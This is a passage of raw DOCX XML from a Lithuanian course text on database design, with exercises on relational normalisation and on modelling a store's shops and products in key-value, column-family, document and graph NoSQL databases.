          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:right="284" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_ytvcsqxc4yf1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="148"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parduodami ne visi leidiniai. Sunkiau parduoti, pavyzdžiui, kokius nors ypatingus leidimus. O kai kurių leidinių nepavyksta parduoti nei egzemplioriaus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Suprojektuokite tokią duomenų bazę, atitinkančią 3 normalinės formos reikalavimus. Projekte turi būti nurodyti pirminiai ir antriniai raktai, ryšiai tarp lentelių ir jų tipai. (P.S. ne mažiau 7 lentelės, įmanoma ir su 6). Ne visa informacija yra skirta projektavimo aspektams. Kontrolinis klausimas: kuris autorius populiariausias?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc10443973"/>
      <w:bookmarkStart w:id="150" w:name="_Toc13095522"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="151" w:name="_Toc13833416"/>
      <w:bookmarkStart w:id="152" w:name="_Toc14392447"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Pateikti nereliacinės (NoSQL) duomenų bazės schemą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc10443974"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nereliacinių (NoSQL) duomenų bazių užduotims atlikti rekomenduojamos duomenų bazės: Redis, Cassandra, MongoDB ir Neo4J. Galimi sprendimai pateikiami naudojant būtent šias duomenų bazes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Scenarijus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sumodeliuokite duomenų bazę parduotuvei. Parduotuvės duomenų bazėje saugomos pačios parduotuvės ir jų prekės.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Parduotuvės.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiekviena parduotuvė identifikuojama jos kodu (pavyzdžiui „V1“, „K2“ar pan.). Kiekvienai parduotuvei saugoma jos plotas kvadratiniais metrais, adresas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prekės.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiekvienoje parduotuvėje saugomas joje esančių prekių sąrašas. Kiekviena prekė turi unikalų skaitinį kodą (pavyzdžiui „11559245“). Kiekvienai prekei saugomas jos pavadinimas, vieneto svoris, vieneto kaina, kiekis. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PATEIKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KEY-VALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> DUOMENŲ BAZĖS MODELĮ PARDUOTUVEI. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00530B83" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įvertinkite, kaip saugoti sudėtinius raktus, kaip saugoti reikšmes, ryšius tarp prekių ir parduotuvės</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Operacijos su duomenų baze:</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Gauti parduotuvės informaciją</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Gauti konkretaus tipo prekės, konkrečioje parduotuvėje informaciją</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:right="284" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Bonus: gauti visas prekes esančias parduotuvėje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PATEIKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>COLUMN FAMILY</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> DUOMENŲ MODELĮ PARDUOTUVĖS SCENARIJUI</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Duomenų bazėje turi būti galimybė vykdyti šias užklausas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkti parduotuvės informaciją pagal jos kodą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkti visas prekes, esančias pasirinktoje parduotuvėje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sužinoti, kiek vienetų prekių su pasirinktu kodu yra parduotuvėje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARDUOTUVĖJE ATSIRADO NAUJAS REIKALAVIMAS – PAGAL PREKĖS KODĄ GAUTI PARDUOTUVIŲ, KURIOSE YRA ŠI PREKĖ, SĄRAŠĄ SU PREKĖS VIENETŲ SKAIČIUMI. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00530B83" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kaip pakeisti duomenų bazės schemą ir darbo su ja užklausas šiam reikalavimui įgyvendinti?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68"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SUMODELIUOKITE PARDUOTUVĖS SCENARIJŲ DOKUMENTŲ DUOMENŲ BAZĖJE</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYKITE ŠIAS UŽKLAUSAS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite parduotuvę pagal jos kodą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visas prekes, esančias pasirinktoje parduotuvėje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visas parduotuves, kuriose yra prekė pasirinktu kodu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Gaukite kiekvienoje parduotuvėje esančių prekių bendrą kiekį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUMODELIUOKITE PARDUOTUVĖS SCENARIJŲ GRAFŲ DUOMENŲ BAZĖJE</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PARAŠYKITE ŠIAS UŽKLAUSAS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite parduotuvę pagal jos kodą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visas prekes, esančias pasirinktoje parduotuvėje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visas parduotuves, kuriose yra prekė pasirinktu kodu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite kiekvienoje parduotuvėje esančių prekių bendrą vienetų kiekį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATSIRADO PAPILDOMAS REIKALAVIMAS SUSIETI PREKES SU GAMINTOJO INFORMACIJA. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00530B83" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
